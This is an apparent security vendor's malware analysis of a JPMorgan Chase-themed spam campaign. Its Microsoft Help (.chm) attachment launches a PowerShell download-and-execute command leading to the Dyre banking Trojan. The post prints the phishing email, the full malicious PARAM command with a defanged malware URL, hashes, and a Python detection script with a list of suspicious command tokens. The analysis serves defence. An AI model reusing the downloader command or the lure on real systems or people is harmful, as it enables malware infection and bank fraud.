Microsoft Help File Malware Targets JPMorgan Chase Customers

A fresh malware sample was recently spotted using a Microsoft Compiled HTML Help file attached to spam messages. A compiled help file is a single binary container that bundles a set of HTML pages (with their images and scripts) and carries a .chm extension; the older WinHelp format uses .hlp.

The malicious help file analyzed, a .chm file, arrived via a spam email purporting to come from JPMorgan Chase & Co., a global financial services firm. The text of the email is as follows:

“Dear client,

As your personal manager, I would like to inform you that the terms for your credit agreement terms have been changed according to the new bank policy. Please consult the following Attachment to learn the new terms.

Yours sincerely,

Chase Bank.” 

The email carries an attachment named “cannon.zip”; the archive contains a .chm file named “Message.chm”.

Using a file viewer makes it clear that the .chm file is compressed.


If the .chm is opened, a command prompt window appears briefly, a hint that something is running in the background.

The help file contains this message.


Viewing the HTML source of the help page shows how that command prompt is launched: the page embeds an HTML Help ActiveX shortcut object whose Item1 parameter names the program to run (cmd) and its arguments, and those arguments invoke PowerShell to download and execute another file:

<PARAM name="Item1"

value=",cmd,/c powershell (New-Object System.Net.WebClient).DownloadFile('hxxp://integrityshavenequinerescuecentre.ca/css/oswald-webfont/test.exe','%TEMP%\natmasla2.exe');(New-Object -com Shell.Application).ShellExecute('%TEMP%\natmasla2.exe')">

<PARAM name="Item2" value="273,1,1">

Because the command runs through cmd /c, the %TEMP% variable is expanded by cmd.exe before PowerShell ever sees it. The script downloads a file from a known malware site, saves it in the user's TEMP folder as natmasla2.exe, and immediately executes it through the Shell.Application ShellExecute method. The Item2 value 273,1,1 is a window message plus its wParam and lParam (273 = 0x111 = WM_COMMAND) that the shortcut control can send; the payload itself is carried entirely by Item1.
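The PowerShell one-liner above is reached through the HTML Help control's shortcut mechanism, so triage of a suspicious .chm comes down to finding those OBJECT/PARAM pairs in the decompiled pages. The following Python script is an added example written for this article, not the researcher's own tooling: it assumes the .chm has already been unpacked (for example with hh.exe -decompile or 7-Zip), parses each page for shortcut objects, decodes the Item1 field using the documented "window name,program,parameters" layout, and pulls out the program, any URLs and %TEMP% drop paths. The sample page it runs against is constructed here from the PARAM lines quoted above; the enclosing OBJECT tag, its CLSID, the Command/Button parameters and the Click() call are assumptions about the standard shortcut layout rather than content shown on this page.

```python
"""Triage helper for a decompiled CHM: locate HTML Help "ShortCut" objects
and extract the command line they launch.

Assumes the .chm has already been unpacked, e.g. with
    hh.exe -decompile out_dir Message.chm
or 7-Zip, and that the HTML pages from out_dir are fed to analyse_html().
"""
import json
import re
from html.parser import HTMLParser

# CLSID of the HTML Help ActiveX control (hhctrl.ocx). Assumption: the
# write-up quotes only the PARAM lines, not the enclosing OBJECT tag.
HHCTRL_CLSID = "adb880a6-d8ff-11cf-9377-00aa003b7a11"

# Constructed sample modelled on the PARAM lines quoted in the write-up.
# The OBJECT wrapper, Command/Button params and Click() call are assumptions
# about the standard shortcut layout, not text taken from the page.
SAMPLE_HTML = """<html><body>
<object id="x" classid="clsid:adb880a6-d8ff-11cf-9377-00aa003b7a11" width="1" height="1">
  <param name="Command" value="ShortCut">
  <param name="Button" value="Bitmap::shortcut">
  <param name="Item1" value=",cmd,/c powershell (New-Object System.Net.WebClient).DownloadFile('hxxp://integrityshavenequinerescuecentre.ca/css/oswald-webfont/test.exe','%TEMP%\\natmasla2.exe');(New-Object -com Shell.Application).ShellExecute('%TEMP%\\natmasla2.exe')">
  <param name="Item2" value="273,1,1">
</object>
<script>x.Click();</script>
<p>Dear client, please see the attachment.</p>
</body></html>"""

# Tokens that mark a shortcut as living-off-the-land abuse rather than a
# legitimate "open this program" help link.
SUSPICIOUS_TOKENS = ("cmd", "powershell", "downloadfile", "downloadstring",
                     "shellexecute", "mshta", "wscript", "cscript",
                     "rundll32", "regsvr32", "certutil", "bitsadmin")
URL_RE = re.compile(r"(?:https?|hxxps?)://[^\s'\"()<>]+", re.I)
DROP_RE = re.compile(r"%[A-Za-z_]+%\\?[^\s'\")]*")


class _ObjectCollector(HTMLParser):
    """Collect every <object> together with its <param name=... value=...> pairs."""

    def __init__(self):
        super().__init__()  # convert_charrefs=True: &quot; and friends are decoded
        self.objects = []
        self._current = None

    def handle_starttag(self, tag, attrs):
        a = {k.lower(): (v or "") for k, v in attrs}
        if tag == "object":
            self._current = {"classid": a.get("classid", "").lower(), "params": {}}
        elif tag == "param" and self._current is not None:
            self._current["params"][a.get("name", "").lower()] = a.get("value", "")

    def handle_endtag(self, tag):
        if tag == "object" and self._current is not None:
            self.objects.append(self._current)
            self._current = None


def parse_shortcut(obj):
    """Decode one object's Item1/Item2; return None if it is not a shortcut."""
    params = obj["params"]
    item1 = params.get("item1")
    if not item1 or "," not in item1:
        return None
    # Documented shortcut syntax: "window name,program,parameters".
    parts = item1.split(",", 2)
    parts += [""] * (3 - len(parts))
    window, program, args = (p.strip() for p in parts)
    full_cmd = f"{program} {args}".strip()
    lowered = full_cmd.lower()
    indicators = [t for t in SUSPICIOUS_TOKENS if t in lowered]
    urls = list(dict.fromkeys(URL_RE.findall(full_cmd)))
    return {
        "hhctrl": HHCTRL_CLSID in obj["classid"],
        "command": params.get("command", ""),
        "window": window,
        "program": program,
        "args": args,
        # Item2 is "message,wParam,lParam"; 273 == 0x111 == WM_COMMAND.
        "item2": params.get("item2", ""),
        "urls": urls,
        "drop_paths": list(dict.fromkeys(DROP_RE.findall(args))),
        "indicators": indicators,
        "suspicious": bool(indicators or urls),
    }


def analyse_html(html):
    """Return a finding for every shortcut object in one decompiled page."""
    collector = _ObjectCollector()
    collector.feed(html)
    collector.close()
    return [f for f in map(parse_shortcut, collector.objects) if f]


if __name__ == "__main__":
    print(json.dumps(analyse_html(SAMPLE_HTML), indent=2))
```

Run it over every .htm/.html the decompile produces; a finding with suspicious set deserves a closer look, and the urls and drop_paths fields give you the network and file indicators to hunt for elsewhere in the estate.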

The first downloaded file then contacts a PHP resource and receives instructions to download a second file, which contains Dyre (also known as Dyreza). As noted recently, Dyre is a banking Trojan with botnet and other capabilities.

MD5 Hashes:

  • chm: 14b166abd7279baa483cfc6e33fc5a3e
  • First download (exe): e821100cd69a0902d6ac5b1e56874692
  • Second download (served by rss.php): 72841b43391206f983b0fa2ea0be331a

VIPRE Detections:

  • .chm is detected by VIPRE as CHM.Generic.a (v)
  • First download is detected by VIPRE as Malware!Drop
  • Second download is detected by VIPRE as Win32.Generic!BT

VIPRE blacklists both URLs:

  • First download: hxxp://integrityshavenequinerescuecentre.ca/css/oswald-webfont/test.exe
  • Second download: hxxp://nsgatewayllc.com/news/rss.php

The malicious spam containing this attachment did not originate from JPMorgan Chase or Microsoft. There is no evidence that JPMorgan or Microsoft, or any of their systems have been compromised.

Credit: Dean Lawrence M. Bueno – Malware Researcher


ThreatTrack Security Labs

About the Author

ThreatTrack Security Labs is the power behind the malware analysis, detection and remediation technologies developed by ThreatTrack Security. From facilities in the United States and the Philippines, our team of cybersecurity professionals, malware researchers, engineers and software developers work around the clock to discover and combat Advanced Persistent Threats, targeted attacks, Zero-days and other sophisticated malware. The company develops advanced cybersecurity solutions that Expose, Analyze and Eliminate the latest malicious threats, including its ThreatSecure advanced threat detection and remediation platform, ThreatAnalyzer malware behavioral analysis sandbox, ThreatIQ real-time threat intelligence service, and VIPRE business antivirus endpoint protection. Learn more about ThreatTrack Security.